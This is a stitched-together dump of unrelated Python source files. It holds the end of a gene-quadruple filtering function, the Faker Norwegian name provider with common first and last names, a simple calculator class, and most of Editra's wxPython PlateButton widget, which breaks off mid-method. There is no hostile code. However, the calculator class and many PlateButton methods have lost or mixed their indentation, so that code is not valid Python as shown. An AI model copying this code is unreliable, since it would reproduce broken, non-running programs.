    #print(odd_gene_map)
    #print(even_gene_map)
    #print(gene_map)
    #print('HG + TP/TN done')
    output = pd.DataFrame({
        'gene_1': odd_gene_map[quads_indices[0]],
        'gene_2': even_gene_map[quads_indices[0]],
        'gene_3': odd_gene_map[quads_indices[1]],
        'gene_4': even_gene_map[quads_indices[1]],
        'HG_stat': hg_result,
        'TP' : tp_result,
        'TN': tn_result
    }, columns=['gene_1', 'gene_2', 'gene_3', 'gene_4', 'HG_stat','TP','TN'])
    en = time.time()
    print(str(en-st) + ' seconds')
    print('end HG/TP/TN')
    print('')
    print('begin filter')
    filt = time.time()
    output = output.sort_values(by='HG_stat', ascending=True)
    counter=0
    prev_stat = 0
    dropped=0
    for index, row in output.iterrows():
        # Keep at most 1000 rows after deduplication.
        if counter == 1000:
            break
        #if row['gene_1'] != 'LY6D' or row['gene_2'] != 'CD3G_c':
        #    output.drop([index],inplace=True)
        #    dropped=dropped + 1
        #    print(dropped)
        #    continue
        #if row[-1] < .9:
        #    output.drop([index],inplace=True)
        #    continue
        # Drop combinations that reuse a gene; label access replaces the
        # positional row[i] lookups, which are removed in pandas 3.
        if (row['gene_1']==row['gene_2'] or row['gene_2']==row['gene_3']
                or row['gene_1']==row['gene_3'] or row['gene_1']==row['gene_4']
                or row['gene_2']==row['gene_4'] or row['gene_3']==row['gene_4']):
            output.drop([index],inplace=True)
            continue
        # NOTE(review): the original compared positional row[3], which is
        # gene_4 -- NOT HG_stat (row[4]).  This dedup therefore compares
        # gene names; it looks inherited from the 3-gene version, where
        # index 3 was HG_stat.  Behavior preserved here -- confirm intent
        # before changing to row['HG_stat'].
        if row['gene_4'] == prev_stat:
            output.drop([index],inplace=True)
            continue
        else:
            prev_stat = row['gene_4']
            counter = counter+1
    endfilt = time.time()
    print(str(endfilt-filt) + ' seconds')
    print('end filter')
    return output
/Faker-19.3.1.tar.gz/Faker-19.3.1/faker/providers/person/no_NO/__init__.py | from .. import Provider as PersonProvider
class Provider(PersonProvider):
    """Person name provider for the Norwegian (``no_NO``) locale.

    The name data comes from Statistics Norway (SSB); see the source URLs
    in the comments below.  Repeated entries in ``formats`` deliberately
    weight the plain "first-name last-name" pattern more heavily than the
    hyphenated, double-surname, and prefixed variants.
    """

    formats = (
        "{{first_name}} {{last_name}}",
        "{{first_name}} {{last_name}}",
        "{{first_name}} {{last_name}}",
        "{{first_name}} {{last_name}}",
        "{{first_name}} {{last_name}}",
        "{{first_name}} {{last_name}}",
        "{{first_name}} {{last_name}}",
        "{{first_name}} {{last_name}}",
        "{{first_name}} {{last_name}}",
        "{{first_name}} {{last_name}}",
        "{{first_name}} {{last_name}}",
        "{{first_name}} {{last_name}}",
        "{{first_name}} {{last_name}}",
        "{{first_name}} {{last_name}}",
        "{{first_name}} {{last_name}}",
        "{{first_name}} {{last_name}}",
        "{{first_name_male}}-{{first_name_male}} {{last_name}}",
        "{{first_name_male}}-{{first_name_male}} {{last_name}}",
        "{{first_name_female}}-{{first_name_female}} {{last_name}}",
        "{{first_name_female}}-{{first_name_female}} {{last_name}}",
        "{{first_name}} {{last_name}}-{{last_name}}",
        "{{first_name}} {{last_name}}-{{last_name}}",
        "{{prefix}} {{first_name_male}} {{last_name}}",
    )

    # 100 most common male first names, alphabetically.
    # Source: http://www.ssb.no/a/navn/fornavn-menn-100.html
    first_names_male = (
        "Adrian",
        "Alexander",
        "Alf",
        "Anders",
        "Andreas",
        "Arild",
        "Arne",
        "Asbjørn",
        "Bjørn",
        "Christian",
        "Dag",
        "Daniel",
        "Egil",
        "Einar",
        "Eirik",
        "Eivind",
        "Emil",
        "Erik",
        "Erling",
        "Espen",
        "Finn",
        "Frank",
        "Fredrik",
        "Frode",
        "Geir",
        "Gunnar",
        "Hans",
        "Harald",
        "Helge",
        "Henrik",
        "Håkon",
        "Håvard",
        "Ivar",
        "Jan",
        "Jens",
        "Joakim",
        "Johannes",
        "Johan",
        "John",
        "Jonas",
        "Jon",
        "Jørgen",
        "Karl",
        "Kenneth",
        "Kim",
        "Kjell",
        "Kjetil",
        "Knut",
        "Kåre",
        "Kristian",
        "Kristoffer",
        "Lars",
        "Leif",
        "Magne",
        "Magnus",
        "Marius",
        "Markus",
        "Martin",
        "Mathias",
        "Morten",
        "Nils",
        "Odd",
        "Ola",
        "Olav",
        "Ole",
        "Per",
        "Petter",
        "Pål",
        "Roar",
        "Robert",
        "Roger",
        "Rolf",
        "Roy",
        "Rune",
        "Sander",
        "Sebastian",
        "Sigurd",
        "Simen",
        "Sindre",
        "Sondre",
        "Steinar",
        "Stein",
        "Stian",
        "Stig",
        "Svein",
        "Sverre",
        "Terje",
        "Thomas",
        "Thor",
        "Tobias",
        "Tommy",
        "Tom",
        "Torbjørn",
        "Tore",
        "Tor",
        "Trond",
        "Vegard",
        "Vidar",
        "Øystein",
        "Øyvind",
    )

    # 100 most common female first names, alphabetically.
    # Source: http://www.ssb.no/a/navn/fornavn-kvinner-100.html
    first_names_female = (
        "Andrea",
        "Anette",
        "Anita",
        "Anna",
        "Anne",
        "Ann",
        "Astrid",
        "Aud",
        "Bente",
        "Berit",
        "Bjørg",
        "Britt",
        "Camilla",
        "Cathrine",
        "Cecilie",
        "Elin",
        "Elisabeth",
        "Elise",
        "Eli",
        "Ellen",
        "Else",
        "Emilie",
        "Emma",
        "Eva",
        "Gerd",
        "Grete",
        "Grethe",
        "Gro",
        "Gunn",
        "Hanna",
        "Hanne",
        "Hege",
        "Heidi",
        "Helene",
        "Hilde",
        "Ida",
        "Ingeborg",
        "Inger",
        "Ingrid",
        "Irene",
        "Janne",
        "Jenny",
        "Jorunn",
        "Julie",
        "Karen",
        "Karin",
        "Kari",
        "Karoline",
        "Kirsten",
        "Kjersti",
        "Kristine",
        "Kristin",
        "Laila",
        "Lene",
        "Linda",
        "Line",
        "Linn",
        "Lise",
        "Liv",
        "Malin",
        "Maren",
        "Marianne",
        "Maria",
        "Marie",
        "Mari",
        "Marit",
        "Marte",
        "Martine",
        "May",
        "Mette",
        "Mona",
        "Monica",
        "Nina",
        "Nora",
        "Ragnhild",
        "Randi",
        "Reidun",
        "Rita",
        "Ruth",
        "Sara",
        "Sigrid",
        "Silje",
        "Siri",
        "Sissel",
        "Siv",
        "Sofie",
        "Solveig",
        "Stine",
        "Synnøve",
        "Thea",
        "Tone",
        "Tonje",
        "Torill",
        "Tove",
        "Trine",
        "Turid",
        "Unni",
        "Vilde",
        "Wenche",
        "Åse",
    )

    first_names = first_names_male + first_names_female

    # 100 most common last names, alphabetically.
    # Source: http://www.ssb.no/a/navn/alf/etter100.html
    last_names = (
        "Aasen",
        "Aas",
        "Abrahamsen",
        "Ahmed",
        "Ali",
        "Amundsen",
        "Andersen",
        "Andreassen",
        "Andresen",
        "Antonsen",
        "Arnesen",
        "Aune",
        "Bakken",
        "Bakke",
        "Berge",
        "Berg",
        "Berntsen",
        "Bøe",
        "Birkeland",
        "Brekke",
        "Christensen",
        "Dahl",
        "Danielsen",
        "Edvardsen",
        "Eide",
        "Eliassen",
        "Ellingsen",
        "Engen",
        "Eriksen",
        "Evensen",
        "Fredriksen",
        "Gulbrandsen",
        "Gundersen",
        "Hagen",
        "Halvorsen",
        "Hansen",
        "Hanssen",
        "Haugen",
        "Hauge",
        "Haugland",
        "Haug",
        "Helland",
        "Henriksen",
        "Holm",
        "Isaksen",
        "Iversen",
        "Jacobsen",
        "Jakobsen",
        "Jensen",
        "Jenssen",
        "Johannessen",
        "Johansen",
        "Johnsen",
        "Jørgensen",
        "Karlsen",
        "Knudsen",
        "Knutsen",
        "Kristensen",
        "Kristiansen",
        "Kristoffersen",
        "Larsen",
        "Lien",
        "Lie",
        "Lunde",
        "Lund",
        "Madsen",
        "Martinsen",
        "Mathisen",
        "Mikkelsen",
        "Moen",
        "Moe",
        "Myhre",
        "Myklebust",
        "Nguyen",
        "Nielsen",
        "Nilsen",
        "Næss",
        "Nygård",
        "Olsen",
        "Paulsen",
        "Pedersen",
        "Pettersen",
        "Rasmussen",
        "Rønning",
        "Ruud",
        "Sandvik",
        "Simonsen",
        "Sivertsen",
        "Solberg",
        "Solheim",
        "Sørensen",
        "Sæther",
        "Strand",
        "Strøm",
        "Svendsen",
        "Tangen",
        "Thomassen",
        "Thorsen",
        "Tveit",
        "Vik",
        "Ødegård",
    )

    prefixes = (
        "Dr.",
        "Prof.",
    )
/BahaCalculator-1.0.0-py3-none-any.whl/Calculator/calculator.py | class BahaCalculator:
"""
A class representing a basic calculator.
Attributes:
memory (float): The current value in the calculator's memory.
"""
def __init__(self):
"""
Initialize a new Calculator object with memory value of 0.
"""
self.memory = 0.0
def add(self, value):
"""
Add a value to the current memory.
Input:
value (float): The value to add to the current memory.
Returns:
float: The new value of the calculator's memory.
"""
self.memory += value
return self.memory
def subtract(self, value):
"""
Subtract a value from the current memory.
Input:
value (float): The value to subtract from the current memory.
Returns:
float: The new value of the calculator's memory.
"""
self.memory -= value
return self.memory
def multiply(self, value):
"""
Multiply the current memory by a value.
Input:
value (float): The value to multiply the current memory by.
Returns:
float: The new value of the calculator's memory.
"""
self.memory *= value
return self.memory
def divide(self, value):
"""
Divide the current memory by a value.
Input:
value (float): The value to divide the current memory by.
Returns:
float: The new value of the calculator's memory.
"""
if value == 0:
raise ValueError("Cannot divide by zero")
self.memory /= value
return self.memory
def root(self, n):
"""
Take the nth root of the current memory.
Input:
n (int): The root to take of the current memory.
Returns:
float: The new value of the calculator's memory.
"""
if n == 0:
return 'Cant take the 0th root' #check for zero division
self.memory **= (1/n)
return self.memory
def reset(self):
"""
Reset the memory to 0.
Returns:
float: The new value of the calculator's memory (0.0).
"""
self.memory = 0.0
return self.memory
if __name__ == "__main__":
    # Smoke demo: only runs when this module is executed directly, so merely
    # importing the package no longer prints to stdout.
    c = BahaCalculator()
    print(c.add(2))
    print(c.multiply(4))
    print(c.reset())
/Editra-0.7.20.tar.gz/Editra-0.7.20/src/eclib/platebtn.py | __author__ = "Cody Precord <cprecord@editra.org>"
__svnid__ = "$Id: platebtn.py 73153 2012-12-08 20:23:44Z CJP $"
__revision__ = "$Revision: 73153 $"
__all__ = ["PlateButton",
"PLATE_NORMAL", "PLATE_PRESSED", "PLATE_HIGHLIGHT",
"PB_STYLE_DEFAULT", "PB_STYLE_GRADIENT", "PB_STYLE_SQUARE",
"PB_STYLE_NOBG", "PB_STYLE_DROPARROW", "PB_STYLE_TOGGLE",
"EVT_PLATEBTN_DROPARROW_PRESSED"]
#-----------------------------------------------------------------------------#
# Imports
import wx
import wx.lib.newevent
# Local Imports
from eclutil import *
#-----------------------------------------------------------------------------#
# Button States
PLATE_NORMAL = 0
PLATE_PRESSED = 1
PLATE_HIGHLIGHT = 2
# Button Styles
PB_STYLE_DEFAULT = 1   # Normal Flat Background
PB_STYLE_GRADIENT = 2  # Gradient Filled Background
PB_STYLE_SQUARE = 4    # Use square corners instead of rounded
PB_STYLE_NOBG = 8      # Useful on Windows to get a transparent appearance
                       # when the control is shown on a non-solid background
PB_STYLE_DROPARROW = 16  # Draw drop arrow and fire EVT_PLATEBTN_DROPARROW_PRESSED event
PB_STYLE_TOGGLE = 32     # Stay pressed until clicked again
#-----------------------------------------------------------------------------#
# EVT_BUTTON used for normal event notification
# EVT_TOGGLE_BUTTON used for toggle button mode notification
PlateBtnDropArrowPressed, EVT_PLATEBTN_DROPARROW_PRESSED = wx.lib.newevent.NewEvent()
#-----------------------------------------------------------------------------#
class PlateButton(wx.PyControl):
"""PlateButton is a custom type of flat button with support for
displaying bitmaps and having an attached dropdown menu.
"""
    def __init__(self, parent, id=wx.ID_ANY, label='', bmp=None,
                 pos=wx.DefaultPosition, size=wx.DefaultSize,
                 style=PB_STYLE_DEFAULT, name=wx.ButtonNameStr):
        """Create a PlateButton
        @param parent: Parent window
        @keyword id: Window id
        @keyword label: Buttons label text
        @keyword bmp: Buttons bitmap
        @keyword pos: Window position
        @keyword size: Window size
        @keyword style: Button style (bitmask of PB_STYLE_* flags)
        @keyword name: Window name
        """
        super(PlateButton, self).__init__(parent, id, pos, size,
                                          wx.BORDER_NONE|wx.TRANSPARENT_WINDOW,
                                          name=name)

        # Attributes
        self.InheritAttributes()
        # Enabled/disabled bitmaps; the disabled one is a greyscale copy
        # generated from the enabled bitmap below.
        self._bmp = dict(enable=None, disable=None)
        if bmp is not None:
            assert isinstance(bmp, wx.Bitmap) and bmp.IsOk()
            self._bmp['enable'] = bmp
            img = bmp.ConvertToImage()
            img = img.ConvertToGreyscale(.795, .073, .026) #(.634, .224, .143)
            self._bmp['disable'] = wx.BitmapFromImage(img)

        self._menu = None
        self.SetLabel(label)
        self._style = style
        # Previous and current interaction state (PLATE_* values)
        self._state = dict(pre=PLATE_NORMAL, cur=PLATE_NORMAL)
        self._color = self.__InitColors()
        self._pressed = False

        # Setup Initial Size
        self.SetInitialSize(size)

        # Event Handlers
        self.Bind(wx.EVT_PAINT, lambda evt: self.__DrawButton())
        self.Bind(wx.EVT_ERASE_BACKGROUND, self.OnErase)
        self.Bind(wx.EVT_SET_FOCUS, self.OnFocus)
        self.Bind(wx.EVT_KILL_FOCUS, self.OnKillFocus)

        # Mouse Events
        self.Bind(wx.EVT_LEFT_DCLICK, lambda evt: self._ToggleState())
        self.Bind(wx.EVT_LEFT_DOWN, self.OnLeftDown)
        self.Bind(wx.EVT_LEFT_UP, self.OnLeftUp)
        self.Bind(wx.EVT_ENTER_WINDOW,
                  lambda evt: self._SetState(PLATE_HIGHLIGHT))
        # Delay the leave handling slightly so quick re-entries don't flicker
        self.Bind(wx.EVT_LEAVE_WINDOW,
                  lambda evt: wx.CallLater(80, self.__LeaveWindow))

        # Other events
        self.Bind(wx.EVT_KEY_UP, self.OnKeyUp)
        self.Bind(wx.EVT_CONTEXT_MENU, lambda evt: self.ShowMenu())
def __DrawBitmap(self, gc):
"""Draw the bitmap if one has been set
@param gc: GCDC to draw with
@return: x cordinate to draw text at
"""
if self.IsEnabled():
bmp = self._bmp['enable']
else:
bmp = self._bmp['disable']
if bmp is not None and bmp.IsOk():
bw, bh = bmp.GetSize()
ypos = (self.GetSize()[1] - bh) // 2
gc.DrawBitmap(bmp, 6, ypos, bmp.GetMask() != None)
return bw + 6
else:
return 6
def __DrawDropArrow(self, gc, xpos, ypos):
"""Draw a drop arrow if needed and restore pen/brush after finished
@param gc: GCDC to draw with
@param xpos: x cord to start at
@param ypos: y cord to start at
"""
if self._menu is not None or self._style & PB_STYLE_DROPARROW:
# Positioning needs a little help on Windows
if wx.Platform == '__WXMSW__':
xpos -= 2
tripoints = [(xpos, ypos), (xpos + 6, ypos), (xpos + 3, ypos + 5)]
brush_b = gc.GetBrush()
pen_b = gc.GetPen()
gc.SetPen(wx.TRANSPARENT_PEN)
gc.SetBrush(wx.Brush(gc.GetTextForeground()))
gc.DrawPolygon(tripoints)
gc.SetBrush(brush_b)
gc.SetPen(pen_b)
else:
pass
    def __DrawHighlight(self, gc, width, height):
        """Draw the main highlight/pressed state
        @param gc: GCDC to draw with
        @param width: width of highlight
        @param height: height of highlight
        """
        # Pressed and hover states use slightly different fill colors.
        if self._state['cur'] == PLATE_PRESSED:
            color = self._color['press']
        else:
            color = self._color['hlight']

        # Square style draws a plain rectangle; otherwise round the corners.
        if self._style & PB_STYLE_SQUARE:
            rad = 0
        else:
            rad = (height - 3) / 2

        if self._style & PB_STYLE_GRADIENT:
            # Vertical gradient fading toward a more transparent shade.
            gc.SetBrush(wx.TRANSPARENT_BRUSH)
            rgc = gc.GetGraphicsContext()
            brush = rgc.CreateLinearGradientBrush(0, 1, 0, height,
                                                  color, AdjustAlpha(color, 55))
            rgc.SetBrush(brush)
        else:
            gc.SetBrush(wx.Brush(color))

        gc.DrawRoundedRectangle(1, 1, width - 2, height - 2, rad)
def __PostEvent(self):
"""Post a button event to parent of this control"""
if self._style & PB_STYLE_TOGGLE:
etype = wx.wxEVT_COMMAND_TOGGLEBUTTON_CLICKED
else:
etype = wx.wxEVT_COMMAND_BUTTON_CLICKED
bevt = wx.CommandEvent(etype, self.GetId())
bevt.SetEventObject(self)
bevt.SetString(self.GetLabel())
self.GetEventHandler().ProcessEvent(bevt)
    def __DrawButton(self):
        """Repaint the whole button for the current interaction state."""
        dc = wx.PaintDC(self)
        gc = wx.GCDC(dc)

        # Setup
        dc.SetBrush(wx.TRANSPARENT_BRUSH)
        gc.SetBrush(wx.TRANSPARENT_BRUSH)
        gc.SetFont(self.Font)
        dc.SetFont(self.Font)
        gc.SetBackgroundMode(wx.TRANSPARENT)

        # The background needs some help to look transparent on
        # on Gtk and Windows
        if wx.Platform in ['__WXGTK__', '__WXMSW__']:
            gc.SetBackground(self.GetBackgroundBrush(gc))
            gc.Clear()

        # Calc Object Positions
        width, height = self.GetSize()
        # Text is measured (and drawn below) with the plain DC on GTK and
        # with the GCDC on other platforms.
        if wx.Platform == '__WXGTK__':
            tw, th = dc.GetTextExtent(self.Label)
        else:
            tw, th = gc.GetTextExtent(self.Label)
        txt_y = max((height - th) // 2, 1)

        if self._state['cur'] == PLATE_HIGHLIGHT:
            gc.SetTextForeground(self._color['htxt'])
            gc.SetPen(wx.TRANSPARENT_PEN)
            self.__DrawHighlight(gc, width, height)

        elif self._state['cur'] == PLATE_PRESSED:
            gc.SetTextForeground(self._color['htxt'])
            if wx.Platform == '__WXMAC__':
                pen = wx.Pen(GetHighlightColour(), 1, wx.SOLID)
            else:
                pen = wx.Pen(AdjustColour(self._color['press'], -80, 220), 1)
            gc.SetPen(pen)

            # Pressed state draws its bitmap/label here, inside the border.
            self.__DrawHighlight(gc, width, height)
            txt_x = self.__DrawBitmap(gc)
            if wx.Platform == '__WXGTK__':
                dc.DrawText(self.Label, txt_x + 2, txt_y)
            else:
                gc.DrawText(self.Label, txt_x + 2, txt_y)
            self.__DrawDropArrow(gc, width - 10, (height // 2) - 2)

        else:
            if self.IsEnabled():
                gc.SetTextForeground(self.GetForegroundColour())
            else:
                txt_c = wx.SystemSettings.GetColour(wx.SYS_COLOUR_GRAYTEXT)
                gc.SetTextForeground(txt_c)

        # Draw bitmap and text
        # (the pressed branch above has already drawn them)
        if self._state['cur'] != PLATE_PRESSED:
            txt_x = self.__DrawBitmap(gc)
            if wx.Platform == '__WXGTK__':
                dc.DrawText(self.Label, txt_x + 2, txt_y)
            else:
                gc.DrawText(self.Label, txt_x + 2, txt_y)
            self.__DrawDropArrow(gc, width - 10, (height // 2) - 2)
def __InitColors(self):
"""Initialize the default colors"""
color = GetHighlightColour()
pcolor = AdjustColour(color, -12)
colors = dict(default=True,
hlight=color,
press=pcolor,
htxt=BestLabelColour(self.GetForegroundColour()))
return colors
def __LeaveWindow(self):
"""Handle updating the buttons state when the mouse cursor leaves"""
if (self._style & PB_STYLE_TOGGLE) and self._pressed:
self._SetState(PLATE_PRESSED)
else:
self._SetState(PLATE_NORMAL)
self._pressed = False
    def _SetState(self, state):
        """Manually set the state of the button
        @param state: one of the PLATE_* values
        @note: the state may be altered by mouse actions
        @note: Internal use only!
        """
        # Remember the previous state before switching.
        self._state['pre'] = self._state['cur']
        self._state['cur'] = state
        if wx.Platform == '__WXMSW__':
            # On Windows, repaint just this button's rectangle via the
            # parent (helps keep the transparent look).
            self.Parent.RefreshRect(self.Rect, False)
        else:
            self.Refresh()
def _ToggleState(self):
"""Toggle button state
@note: Internal Use Only!
"""
if self._state['cur'] != PLATE_PRESSED:
self._SetState(PLATE_PRESSED)
else:
self._SetState(PLATE_HIGHLIGHT)
#---- End Private Member Function ----#
#---- Public Member Functions ----#
BitmapDisabled = property(lambda self: self.GetBitmapDisabled(),
lambda self, bmp: self.SetBitmapDisabled(bmp))
BitmapLabel = property(lambda self: self.GetBitmapLabel(),
lambda self, bmp: self.SetBitmap(bmp))
# Aliases
BitmapFocus = BitmapLabel
BitmapHover = BitmapLabel
BitmapSelected = BitmapLabel
LabelText = property(lambda self: self.GetLabel(),
lambda self, lbl: self.SetLabel(lbl))
def AcceptsFocus(self):
    """Can this window have the focus?
    @return: bool - focus is only accepted while the control is enabled
    """
    return self.IsEnabled()
def Disable(self):
    """Disable the control and repaint to show the greyed-out state"""
    super(PlateButton, self).Disable()
    self.Refresh()
def DoGetBestSize(self):
    """Calculate the best size of the button
    @return: wx.Size
    """
    # Minimal padding around the content
    width = 4
    height = 6
    if self.Label:
        # NOTE: Should measure with a GraphicsContext to get right
        #       size, but due to random segfaults on linux special
        #       handling is done in the drawing instead...
        lsize = self.GetFullTextExtent(self.Label)
        width += lsize[0]
        height += lsize[1]
    if self._bmp['enable'] is not None:
        # Room for the bitmap plus spacing between bitmap and label
        bsize = self._bmp['enable'].Size
        width += (bsize[0] + 10)
        if height <= bsize[1]:
            height = bsize[1] + 6
        else:
            height += 3
    else:
        width += 10
    if self._menu is not None or self._style & PB_STYLE_DROPARROW:
        # Extra horizontal space for the drop-down arrow
        width += 12
    best = wx.Size(width, height)
    self.CacheBestSize(best)
    return best
def Enable(self, enable=True):
    """Enable/Disable the control
    @keyword enable: True to enable, False to disable
    """
    super(PlateButton, self).Enable(enable)
    self.Refresh()
def GetBackgroundBrush(self, dc):
    """Get the brush for drawing the background of the button
    @param dc: device context being painted (currently unused here)
    @return: wx.Brush
    @note: used internally when on gtk
    """
    if wx.Platform == '__WXMAC__' or self._style & PB_STYLE_NOBG:
        return wx.TRANSPARENT_BRUSH
    bkgrd = self.GetBackgroundColour()
    brush = wx.Brush(bkgrd, wx.SOLID)
    my_attr = self.GetDefaultAttributes()
    p_attr = self.Parent.GetDefaultAttributes()
    my_def = bkgrd == my_attr.colBg
    p_def = self.Parent.GetBackgroundColour() == p_attr.colBg
    # If this control still uses the default colour but the parent does
    # not, blend in by adopting the parent's background instead.
    if my_def and not p_def:
        bkgrd = self.Parent.GetBackgroundColour()
        brush = wx.Brush(bkgrd, wx.SOLID)
    return brush
def GetBitmapDisabled(self):
    """Get the bitmap shown in the disabled state
    @return: wx.Bitmap or None
    """
    # Return the stored bitmap directly. Returning `self.BitmapDisabled`
    # (as before) re-enters this method through the BitmapDisabled
    # property getter and recurses until the stack overflows.
    return self._bmp['disable']
def GetBitmapLabel(self):
    """Get the label bitmap
    @return: wx.Bitmap or None
    """
    # Return the stored bitmap directly. Returning `self.BitmapLabel`
    # (as before) re-enters this method through the BitmapLabel
    # property getter and recurses until the stack overflows.
    return self._bmp['enable']
# GetBitmap Aliases for BitmapButton api: focus/hover states reuse the
# label bitmap, so their getters are the same method object.
GetBitmapFocus = GetBitmapLabel
GetBitmapHover = GetBitmapLabel
# Alias for GetLabel (BitmapButton api compatibility)
GetLabelText = wx.PyControl.GetLabel
def GetMenu(self):
    """Return the menu associated with this button or None if no
    menu is associated with it.
    @return: wx.Menu or None
    """
    return self._menu
def GetState(self):
    """Get the current state of the button
    @return: int
    @see: PLATE_NORMAL, PLATE_HIGHLIGHT, PLATE_PRESSED
    """
    # 'cur' holds the active state; 'pre' (see _SetState) the previous one
    return self._state['cur']
def HasTransparentBackground(self):
    """Override setting of background fill
    @return: bool - always True; the background is painted manually
    """
    return True
def IsPressed(self):
    """Return if button is pressed (PB_STYLE_TOGGLE)
    @return: bool
    """
    # Only meaningful for toggle-style buttons; otherwise stays False
    return self._pressed
#---- Event Handlers ----#
def OnErase(self, evt):
    """Trap the erase event to keep the background transparent
    on windows.
    @param evt: wx.EVT_ERASE_BACKGROUND
    """
    if PB_STYLE_NOBG & self._style:
        # Swallow the event entirely for no-background buttons
        return
    evt.Skip()
def OnFocus(self, evt):
    """Set the visual focus state if need be
    @param evt: wx.EVT_SET_FOCUS
    """
    if self._state['cur'] == PLATE_NORMAL:
        self._SetState(PLATE_HIGHLIGHT)
def OnKeyUp(self, evt):
    """Execute a single button press action when the Space key is
    released and this control has the focus.
    @param evt: wx.EVT_KEY_UP
    """
    if evt.GetKeyCode() == wx.WXK_SPACE:
        self._SetState(PLATE_PRESSED)
        self.__PostEvent()
        # Briefly show the pressed state before returning to highlight
        wx.CallLater(100, self._SetState, PLATE_HIGHLIGHT)
    else:
        evt.Skip()
def OnKillFocus(self, evt):
    """Set the visual state back to normal when focus is lost
    unless the control is currently in a pressed state.
    @param evt: wx.EVT_KILL_FOCUS
    """
    # Note: this delay needs to be at least as much as the one in the KeyUp
    #       handler to prevent ghost highlighting from happening when
    #       quickly changing focus and activating buttons
    if self._state['cur'] != PLATE_PRESSED:
        self._SetState(PLATE_NORMAL)
def OnLeftDown(self, evt):
    """Sets the pressed state and depending on the click position will
    show the popup menu if one has been set.
    @param evt: wx.MouseEvent
    """
    if (self._style & PB_STYLE_TOGGLE):
        self._pressed = not self._pressed
    pos = evt.GetPositionTuple()
    self._SetState(PLATE_PRESSED)
    size = self.GetSizeTuple()
    # Clicks within the right-most 16px hit the drop-down arrow area
    if pos[0] >= size[0] - 16:
        if self._menu is not None:
            self.ShowMenu()
        elif self._style & PB_STYLE_DROPARROW:
            event = PlateBtnDropArrowPressed()
            event.SetEventObject(self)
            self.EventHandler.ProcessEvent(event)
    self.SetFocus()
def OnLeftUp(self, evt):
    """Post a button event if the control was previously in a
    pressed state.
    @param evt: wx.MouseEvent
    """
    if self._state['cur'] == PLATE_PRESSED:
        pos = evt.GetPositionTuple()
        size = self.GetSizeTuple()
        # Don't fire a click for releases over the drop-arrow area
        if not (self._style & PB_STYLE_DROPARROW and pos[0] >= size[0] - 16):
            self.__PostEvent()
    # Toggle buttons stay pressed; others fall back to highlight
    if self._pressed:
        self._SetState(PLATE_PRESSED)
    else:
        self._SetState(PLATE_HIGHLIGHT)
def OnMenuClose(self, evt):
    """Refresh the control to a proper state after the menu has been
    dismissed.
    @param evt: wx.EVT_MENU_CLOSE
    """
    mpos = wx.GetMousePosition()
    # Highlight if the cursor is still over the button, else go normal
    if self.HitTest(self.ScreenToClient(mpos)) != wx.HT_WINDOW_OUTSIDE:
        self._SetState(PLATE_HIGHLIGHT)
    else:
        self._SetState(PLATE_NORMAL)
    evt.Skip()
#---- End Event Handlers ----#
def SetBitmap(self, bmp):
    """Set the bitmap displayed in the button
    @param bmp: wx.Bitmap
    """
    self._bmp['enable'] = bmp
    img = bmp.ConvertToImage()
    # Auto-derive the disabled bitmap as a greyscale of the label bitmap
    img = img.ConvertToGreyscale(.795, .073, .026) #(.634, .224, .143)
    self._bmp['disable'] = img.ConvertToBitmap()
    self.InvalidateBestSize()
def SetBitmapDisabled(self, bmp):
    """Set the bitmap for the disabled state
    @param bmp: wx.Bitmap
    """
    # Overrides the greyscale bitmap auto-generated by SetBitmap
    self._bmp['disable'] = bmp
# Aliases for SetBitmap* functions from BitmapButton: all non-disabled
# states share a single bitmap, so every setter maps to SetBitmap.
SetBitmapFocus = SetBitmap
SetBitmapHover = SetBitmap
SetBitmapLabel = SetBitmap
SetBitmapSelected = SetBitmap
def SetFocus(self):
    """Set this control to have the focus"""
    # Show the highlight to indicate focus, unless currently pressed
    if self._state['cur'] != PLATE_PRESSED:
        self._SetState(PLATE_HIGHLIGHT)
    super(PlateButton, self).SetFocus()
def SetFont(self, font):
    """Adjust size of control when font changes
    @param font: wx.Font
    """
    super(PlateButton, self).SetFont(font)
    self.InvalidateBestSize()
def SetLabel(self, label):
    """Set the label of the button
    @param label: label string
    """
    super(PlateButton, self).SetLabel(label)
    self.InvalidateBestSize()
def SetLabelColor(self, normal, hlight=wx.NullColour):
    """Set the color of the label. The optimal label color is usually
    automatically selected depending on the button color. In some
    cases the colors that are chosen may not be optimal.
    The normal state must be specified; if hlight is left Null it will
    be automatically guessed based on the normal color. To prevent this
    automatic color choice from happening either specify a color or
    None for hlight.
    @param normal: Label color for normal state (wx.Colour)
    @keyword hlight: Color for when mouse is hovering over
    """
    assert isinstance(normal, wx.Colour), "Must supply a colour object"
    # Custom colours disable the default colour management
    self._color['default'] = False
    self.SetForegroundColour(normal)
    if hlight is not None:
        if hlight.IsOk():
            self._color['htxt'] = hlight
        else:
            # wx.NullColour (not Ok) means: derive from the normal colour
            self._color['htxt'] = BestLabelColour(normal)
    if wx.Platform == '__WXMSW__':
        self.Parent.RefreshRect(self.GetRect(), False)
    else:
        self.Refresh()
def SetMenu(self, menu):
    """Set the menu that can be shown when clicking on the
    drop arrow of the button.
    @param menu: wxMenu to use as a PopupMenu
    @note: Arrow is not drawn unless a menu is set
    """
    if self._menu is not None:
        # Drop the close handler bound for the previous menu
        self.Unbind(wx.EVT_MENU_CLOSE)
    self._menu = menu
    self.Bind(wx.EVT_MENU_CLOSE, self.OnMenuClose)
    self.InvalidateBestSize()
def SetPressColor(self, color):
    """Set the color used for highlighting the pressed state
    @param color: wx.Colour
    @note: also resets all text colours as necessary
    """
    self._color['default'] = False
    if color.Alpha() == 255:
        # Give fully opaque colours some translucency for the hover state
        self._color['hlight'] = AdjustAlpha(color, 200)
    else:
        self._color['hlight'] = color
    self._color['press'] = AdjustColour(color, -10, 160)
    self._color['htxt'] = BestLabelColour(self._color['hlight'])
    self.Refresh()
def SetWindowStyle(self, style):
    """Sets the window style bits; the updates take place
    immediately, no need to call refresh afterwards.
    @param style: bitmask of PB_STYLE_* values
    """
    self._style = style
    self.Refresh()
def SetWindowVariant(self, variant):
    """Set the variant/font size of this control
    @param variant: one of the wx.WINDOW_VARIANT_* values
    """
    super(PlateButton, self).SetWindowVariant(variant)
    self.InvalidateBestSize()
def ShouldInheritColours(self):
    """Overridden base class virtual. If the parent has non-default
    colours then we want this control to inherit them.
    @return: bool
    """
    return True
def ShowMenu(self):
    """Show the dropdown menu if one is associated with this control"""
    if self._menu is None:
        return
    size = self.GetSizeTuple()
    # Mac needs a small vertical offset so the menu clears the button
    adj = 3 if wx.Platform == '__WXMAC__' else 0
    if self._style & PB_STYLE_SQUARE:
        xpos = 1
    else:
        # Integer division: PopupMenu expects int coordinates; matches
